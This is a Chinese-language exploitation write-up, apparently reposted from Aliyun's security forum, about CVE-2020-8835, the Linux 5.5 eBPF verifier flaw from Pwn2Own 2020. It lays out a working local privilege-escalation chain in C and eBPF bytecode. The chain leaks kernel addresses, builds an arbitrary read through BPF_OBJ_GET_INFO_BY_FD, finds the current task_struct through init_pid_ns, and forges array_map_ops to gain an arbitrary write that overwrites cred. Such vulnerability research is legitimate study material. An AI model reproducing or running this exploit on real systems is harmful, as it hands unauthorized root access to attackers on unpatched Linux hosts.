CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析

CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析
2020-05-07 07:01:00 Author: xz.aliyun.com(查看原文) 阅读量:492 收藏

前言

该漏洞分析和利用思路作者已经公开，并且也有大佬公开了利用（见参考链接），所以本文就不再对漏洞原理进行分析，主要是对通过任意读写来提权的思路进行补充和分析。

环境和exp在附件中，内核版本下载：https://github.com/torvalds/linux/archive/v5.5.tar.gz

越界读写进行信息泄露

mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,key_size,value_size,max_entries,0);

key_size：表示索引的大小范围，key_size=sizeof(int)=4.
value_size：表示map数组每个元素的大小范围，可以任意，只要控制在一个合理的范围
max_entries：表示map数组的大小，编写利用时将其设为1

泄露内核地址

bpf_create_map 创建的是一整个bpf_array结构，我们传入的数据放在value[] 处

/*
 * Array-map object (simplified excerpt). The generic map header comes
 * first and the element data supplied from user space lives in value[],
 * which this write-up measures at offset 0x110 from the structure start.
 */
struct bpf_array {
    struct bpf_map map;         /* generic map header; first member */
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[];           /* <--- element storage (elem) */
        void *ptrs[];
        void *pptrs[];
    };
};

value[]在bpf_array整个结构的偏移为0x110，所以&value[0]-0x110就是bpf_array结构的起始地址；由于map是bpf_array的第一个成员，这同时也是bpf_map结构的地址

/*
 * Generic map header (excerpt; the fields between map_type and writecnt
 * are elided). ops is the first member, so it sits at offset 0 of the map.
 */
struct bpf_map {
    const struct bpf_map_ops *ops;      /* per-map-type operations table */
    struct bpf_map *inner_map_meta;
    void *security;
    enum bpf_map_type map_type;
    //....
    u64 writecnt;
};

bpf_map 有一个const struct bpf_map_ops *ops; 字段，当我们创建的map是BPF_MAP_TYPE_ARRAY 的时候保存的是array_map_ops, array_map_ops 是一个全局变量，可以用于泄露内核地址

泄露map_elem地址

&exp_elem[0]-0x110+0xc0（wait_list）处保存着指向自身的地址，用于泄露exp_elem的地址

(gdb) p/x &(*(struct bpf_array *)0x0)->map.freeze_mutex.wait_list
$9 = 0xc0

利用任意读

通过BPF_OBJ_GET_INFO_BY_FD 命令进行任意读，BPF_OBJ_GET_INFO_BY_FD 会调用bpf_obj_get_info_by_fd：

case BPF_OBJ_GET_INFO_BY_FD:
        err = bpf_obj_get_info_by_fd(&attr, uattr);

#define BPF_OBJ_GET_INFO_BY_FD_LAST_FIELD info.info

static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
                  union bpf_attr __user *uattr)
{
    int ufd = attr->info.bpf_fd;
    struct fd f;
    int err;

    if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
        return -EINVAL;

    f = fdget(ufd);
    if (!f.file)
        return -EBADFD;

    if (f.file->f_op == &bpf_prog_fops)
        err = bpf_prog_get_info_by_fd(f.file->private_data, attr,
                          uattr);
    else if (f.file->f_op == &bpf_map_fops)
        err = bpf_map_get_info_by_fd(f.file->private_data, attr,
                         uattr);
                         ……

之后调用bpf_map_get_info_by_fd：

/*
 * Kernel-side handler: fills a struct bpf_map_info from `map` and copies
 * at most sizeof(info) bytes of it to the user buffer named by
 * attr->info.info, then writes the copied length back to
 * uattr->info.info_len.
 *
 * Returns 0 on success, the error reported by bpf_check_uarg_tail_zero()
 * or bpf_map_offload_info_fill(), or -EFAULT if either user-space write
 * fails.
 */
static int bpf_map_get_info_by_fd(struct bpf_map *map,
                  const union bpf_attr *attr,
                  union bpf_attr __user *uattr)
{
    struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
    struct bpf_map_info info = {};
    u32 info_len = attr->info.info_len;
    int err;

    err = bpf_check_uarg_tail_zero(uinfo, sizeof(info), info_len);
    if (err)
        return err;
    info_len = min_t(u32, sizeof(info), info_len);

    info.type = map->map_type;
    info.id = map->id;
    info.key_size = map->key_size;
    info.value_size = map->value_size;
    info.max_entries = map->max_entries;
    info.map_flags = map->map_flags;
    memcpy(info.name, map->name, sizeof(map->name));

    if (map->btf) {
        info.btf_id = btf_id(map->btf); // arbitrary read: once map->btf is overwritten, btf_id() returns the u32 at map->btf + 0x58 (offset of id inside struct btf)
        info.btf_key_type_id = map->btf_key_type_id;
        info.btf_value_type_id = map->btf_value_type_id;
    }

    if (bpf_map_is_dev_bound(map)) {
        err = bpf_map_offload_info_fill(&info, map);
        if (err)
            return err;
    }

    if (copy_to_user(uinfo, &info, info_len) || // info (including btf_id) is copied to the user-space buffer, which leaks the value
        put_user(info_len, &uattr->info.info_len))
        return -EFAULT;

    return 0;
}

/* Returns the id field of `btf`; the pointer is dereferenced without any check here. */
u32 btf_id(const struct btf *btf)
{
    return btf->id;
}
(gdb) p/x &(*(struct btf*)0)->id  #获取id在btf结构中的偏移
$56 = 0x58

(gdb) p/x &(*(struct bpf_map_info*)0)->btf_id #获取btf_id在bpf_map_info中偏移
$57 = 0x40

所以只需要修改map->btf为target_addr-0x58，就可以泄露到用户态info中，泄漏的信息在struct bpf_map_info 结构偏移0x40处，由于是u32类型，所以只能泄露4个字节。

利用代码如下：

static uint32_t bpf_map_get_info_by_fd(uint64_t key, void *value, int mapfd, void *info) 
{
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)value,
            .info.bpf_fd = mapfd,
            .info.info_len = 0x100,
            .info.info = (__u64)info,
    };

    syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr));
    return *(uint32_t *)((char *)info+0x40);
}

查找task_struct

ksymtab 中保存着两个32位相对偏移：到init_pid_ns结构的偏移，以及到init_pid_ns字符串的偏移（各自相对于该字段自身的地址，见下面gdb的计算）
kstrtab 保存init_pid_ns的字符串

(gdb) p &__ksymtab_init_pid_ns
$48 = (<data variable, no debug info> *) 0xffffffff822f2578
(gdb) x/2wx 0xffffffff822f2578
0xffffffff822f2578: 0x001527c8  0x0000a1f9
(gdb) x/10s 0xffffffff822f257c+0xa1f9
0xffffffff822fc775 <__kstrtab_init_pid_ns>: "init_pid_ns"
0xffffffff822fc781 <__kstrtabns_kernel_param_unlock>:   ""
(gdb) x/10gx 0xffffffff822f2578+0x001527c8
0xffffffff82444d40 <init_pid_ns>:   0x0000000000000002  0x0080000400000000
0xffffffff82444d50 <init_pid_ns+16>:    0xffff88801e469242  0x0000006f00000000

所以我们通过搜索"init_pid_ns" 字符串可以得到kstrtab_init_pid_ns的地址，之后再通过搜索匹配地址+该地址上四个字节（表示偏移）是否等于kstrtab_init_pid_ns的地址来判断是否为ksymtab_init_pid_ns，此时找到的地址为ksymtab_init_pid_ns+4，减去4就是ksymtab_init_pid_ns，上面有init_pid_ns结构的偏移，与ksymtab_init_pid_ns地址相加就可以得到init_pid_ns结构的地址。

之后通过pid 和 init_pid_ns查找对应pid的task_struct，这里其实就是要理清内核的查找过程，在写利用的时候模拟走一遍。最后找到task_struct中cred位置。
内核是通过find_task_by_pid_ns函数实现查找过程的：

/*
 * Looks up the task for pid number `nr` in namespace `ns`: the struct pid
 * returned by find_pid_ns() is handed to pid_task() with PIDTYPE_PID.
 * The lockdep warning text states that rcu_read_lock() protection is needed.
 */
struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
    RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
             "find_task_by_pid_ns() needs rcu_read_lock() protection");
    return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

nr 为当前进程的pid，ns 为init_pid_ns结构地址，我们需要的是idr字段的内容

/* Resolves pid number `nr` through the IDR embedded in the namespace (ns->idr). */
struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
    return idr_find(&ns->idr, nr);
}

lib/idr.c：
/*
 * Looks up `id` in the radix tree idr->idr_rt after subtracting
 * idr->idr_base; both fields are read by this lookup.
 */
void *idr_find(const struct idr *idr, unsigned long id)
{
    return radix_tree_lookup(&idr->idr_rt, id - idr->idr_base);
}

需要获取&idr->idr_rt 和 idr->idr_base

lib/radix-tree.c：
/* Thin wrapper: looks up `index` without asking for the parent node or slot. */
void *radix_tree_lookup(const struct radix_tree_root *root, unsigned long index)
{
    return __radix_tree_lookup(root, index, NULL, NULL);
}

/*
 * Walks the radix tree from root->xa_head down to the entry for `index`.
 *
 * Returns the entry found, or NULL when index exceeds the tree's maxindex.
 * When nodep/slotp are non-NULL they receive the last parent node and the
 * slot pointer reached by the walk.
 */
void *__radix_tree_lookup(const struct radix_tree_root *root,
              unsigned long index, struct radix_tree_node **nodep,
              void __rcu ***slotp)
{
    struct radix_tree_node *node, *parent;
    unsigned long maxindex;
    void __rcu **slot;

 restart:
    parent = NULL;
    slot = (void __rcu **)&root->xa_head;
    radix_tree_load_root(root, &node, &maxindex); // loads the value of root->xa_head into node
    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        unsigned offset;

        parent = entry_to_node(node); // parent = node & 0xfffffffffffffffd (bit 1 cleared)
        offset = radix_tree_descend(parent, &node, index); // step one level down towards the entry for index (here: the current process's pid)
        slot = parent->slots + offset; // address of the slot that was just followed
        if (node == RADIX_TREE_RETRY)
            goto restart;
        if (parent->shift == 0) // shift == 0: stop descending; node is now the looked-up entry
            break;
    }

    if (nodep)
        *nodep = parent; 
    if (slotp)
        *slotp = slot; 
    return node; 
}

重点看radix_tree_descend函数实现：

RADIX_TREE_MAP_MASK : 0x3f
/*
 * Descends one level: selects the child slot of `parent` for `index`,
 * stores that slot's content in *nodep and returns the slot number.
 */
static unsigned int radix_tree_descend(const struct radix_tree_node *parent, 
            struct radix_tree_node **nodep, unsigned long index)
{
    unsigned int offset = (index >> parent->shift) & RADIX_TREE_MAP_MASK;  // reads parent->shift, shifts index by it and masks with RADIX_TREE_MAP_MASK (0x3f)
    void __rcu **entry = rcu_dereference_raw(parent->slots[offset]);  // parent->slots[offset] becomes the next node

    *nodep = (void *)entry; // hand the next node back to the caller

    return offset; // slot number that was followed
}

radix_tree_node的结构如下：

#define radix_tree_node xa_node

/*
 * Tree node; radix_tree_node is #defined to this type. The lookup code
 * shown in this write-up reads only `shift` and `slots[]`.
 */
struct xa_node {
    unsigned char   shift;      /* Bits remaining in each slot */
    unsigned char   offset;     /* Slot offset in parent */
    unsigned char   count;      /* Total entry count */
    unsigned char   nr_values;  /* Value entry count */
    struct xa_node __rcu *parent;   /* NULL at top of tree */
    struct xarray   *array;     /* The array we belong to */
    union {
        struct list_head private_list;  /* For tree user */
        struct rcu_head rcu_head;   /* Used when freeing node */
    };
    void __rcu  *slots[XA_CHUNK_SIZE];  /* child pointers indexed by radix_tree_descend() */
    union {
        unsigned long   tags[XA_MAX_MARKS][XA_MARK_LONGS];
        unsigned long   marks[XA_MAX_MARKS][XA_MARK_LONGS];
    };
};

获得当前进程的node后就可以通过pid_task获取相应的task_struct：

/*
 * Index used for pid->tasks[] and task_struct pid_links[].
 * PIDTYPE_PID is the first enumerator, so its value is 0.
 */
enum pid_type
{
    PIDTYPE_PID,
    PIDTYPE_TGID,
    PIDTYPE_PGID,
    PIDTYPE_SID,
    PIDTYPE_MAX,
};
type 为PIDTYPE_PID， 值为0

#define hlist_entry(ptr, type, member) container_of(ptr,type,member)

/*
 * Maps a struct pid to the first task linked on pid->tasks[type].
 * Returns NULL when pid is NULL or that list is empty.
 */
struct task_struct *pid_task(struct pid *pid, enum pid_type type)
{
    struct task_struct *result = NULL;
    if (pid) {
        struct hlist_node *first;
        first = rcu_dereference_check(hlist_first_rcu(&pid->tasks[type]), // first node of pid->tasks[type] (tasks[0] for PIDTYPE_PID)
                          lockdep_tasklist_lock_is_held());
        if (first)
            result = hlist_entry(first, struct task_struct, pid_links[(type)]);// first is the address of pid_links[type] inside a task_struct; container_of yields the task_struct start address
    }
    return result;
}

利用任意写

在exp_elem上填充伪造的array_map_ops，伪造的array_map_ops中将map_push_elem 填充为map_get_next_key ，这样调用map_push_elem时就会调用map_get_next_key ，并将&exp_elem[0]的地址覆盖到exp_map[0]，同时要修改 map 的一些字段绕过一些检查

spin_lock_off = 0
max_entries = 0xffff ffff 
//写入的index必须小于max_entries-1才能走到*next = index + 1（若index >= array->map.max_entries则只会写入0），所以将max_entries改成0xffff ffff
map_type = BPF_MAP_TYPE_STACK
//map 的类型是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK时，map_update_elem 会调用map_push_elem

最后调用bpf_update_elem任意写内存

bpf_update_elem->map_update_elem(mapfd, &key, &value, flags) -> map_push_elem(被填充成 map_get_next_key )
 ->array_map_get_next_key

/*
 * Writes the key following `key` to *next_key.
 *
 *  - key == NULL or index >= max_entries: writes 0, returns 0.
 *  - index == max_entries - 1:            writes nothing, returns -ENOENT.
 *  - otherwise:                           writes index + 1, returns 0.
 *
 * next_key is written through as a u32 without further checks, which is
 * what the exploit abuses as a 4-byte write once this function is reached
 * with a caller-chosen next_key.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    u32 index = key ? *(u32 *)key : U32_MAX;
    u32 *next = (u32 *)next_key;

    if (index >= array->map.max_entries) {    // out-of-range index: only 0 can be written on this path
        *next = 0;
        return 0;
    }

    if (index == array->map.max_entries - 1)
        return -ENOENT;

    *next = index + 1;
    return 0;
}

map_push_elem 的参数是value 和 uattr 的 flags, 分别对应array_map_get_next_key 的 key 和 next_key 参数，之后有index = value[0]，next = flags ，最终效果是 *flags = value[0]+1，这里index 和 next 都是 u32 类型，所以可以任意地址写 4个byte。

总结

执行的bpf_insn注释：

r6 保存ctrl_elem的地址，r7保存exp_elem的地址，r8为偏移
ctrl_map 保存输入的偏移，泄露的地址，以及执行覆盖伪造的array_map_ops操作
exp_map 保存伪造的array_map_ops

/*
 * eBPF program loaded by the exploit.
 * Registers: r6 = base of the ctrl map element, r7 = pointer derived from
 * the exp map element, r8 = offset read from the ctrl map (later reused
 * for the op code).
 * NOTE(review): BPF_MAP_GET / BPF_MAP_GET_ADDR are helper macros defined
 * outside this excerpt; their descriptions below follow the register notes
 * in this write-up -- confirm against the macro definitions.
 */
struct bpf_insn my_prog[] = {

                //-------- ctrl_mapfd
                BPF_LD_MAP_FD(BPF_REG_9,ctrl_mapfd),
                BPF_MAP_GET(0,BPF_REG_8), 
                BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),              /* r6 = r0; r6 is the ctrl element base used by the stores below */

                BPF_LD_IMM64(BPF_REG_2,0x4000000000),
                BPF_LD_IMM64(BPF_REG_3,0x2000000000),
                BPF_LD_IMM64(BPF_REG_4,0xFFFFffff),
                BPF_LD_IMM64(BPF_REG_5,0x1),

                // 64-bit and 32-bit range checks on r8; every taken branch lands on the "r0 = 0; exit" pair below
                BPF_JMP_REG(BPF_JGT,BPF_REG_8,BPF_REG_2,5),
                BPF_JMP_REG(BPF_JLT,BPF_REG_8,BPF_REG_3,4),
                BPF_JMP32_REG(BPF_JGT,BPF_REG_8,BPF_REG_4,3),
                BPF_JMP32_REG(BPF_JLT,BPF_REG_8,BPF_REG_5,2),

                BPF_ALU64_REG(BPF_AND,BPF_REG_8,BPF_REG_4),       // r8 &= 0xffffffff
                BPF_JMP_IMM(BPF_JA, 0, 0, 2),                     // skip the bail-out pair

                BPF_MOV64_IMM(BPF_REG_0,0x0),
                BPF_EXIT_INSN(),

        //-------- exp_mapfd
                BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
                BPF_MAP_GET_ADDR(0,BPF_REG_7),
                BPF_ALU64_REG(BPF_SUB,BPF_REG_7,BPF_REG_8), // r7 = &exp_elem[0] - r8, with r8 == 0x110 at run time

                BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0),    // r7 = &exp_elem[0]-0x110 (start of the bpf_array); r0 = its first qword, i.e. the array_map_ops address
                BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x10), // leak *(&exp_elem[0]-0x110) into ctrl element + 0x10

                BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0xc0), // r0 = *(&exp_elem[0]-0x110+0xc0), the wait_list field
                BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x18), // leak the wait_list value into ctrl element + 0x18; it points at itself, so it reveals the exp map's address
                BPF_ALU64_IMM(BPF_ADD,BPF_REG_0,0x50), // r0 = (map base + 0xc0) + 0x50 = map base + 0x110 = &exp_elem[0]. Per the author, r0 is used instead of deriving this from r7 because r0 is data loaded from the map while r7 is a pointer, and pointers may not be written into the map
        // &ctrl[0]+0x8 -> op
                BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_6,0x8),  // r8 = op
                BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 1, 4),        // op != 1: skip the four stores below

                BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0), // r7 = &exp_elem[0]-0x110 (map base): overwrite the ops pointer with &exp_elem[0], where the fake array_map_ops is stored
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x18,BPF_MAP_TYPE_STACK),//map type
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x24,-1),// max_entries = 0xffffffff
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x2c,0x0), // spin_lock_off = 0

                BPF_MOV64_IMM(BPF_REG_0,0x0),
                BPF_EXIT_INSN(),

        };

所以利用的整体思路是：

通过漏洞，使得传进来的偏移r8检查时为0，而实际为0x110
计算&exp_elem[0]-0x110，获得exp_map的地址；该地址处（exp_map[0]）保存着array_map_ops的地址，可以用于泄露内核地址
&exp_elem[0]-0x110+0xc0（wait_list）处保存着指向自身的地址，用于泄露exp_elem的地址
利用任意读查找init_pid_ns结构地址
利用进程pid和init_pid_ns结构地址获取当前进程的task_struct
在exp_elem上填充伪造的array_map_ops
修改 map 的一些字段绕过一些检查
调用 bpf_update_elem任意写内存
修改进程task_struct 的cred进行提权。

提权效果图

参考链接

https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
https://www.anquanke.com/post/id/203416
https://github.com/rtfingc/cve-repo/tree/master/0x04-pwn2own-ebpf-jmp32-cve-2020-8835
https://biscuitos.github.io/blog/RADIX-TREE___radix_tree_lookup/
http://sourcelink.top/2019/09/26/linux-kernel-radix-tree-analysis/

文章来源: http://xz.aliyun.com/t/7690
如有侵权请联系:admin#unsafe.sh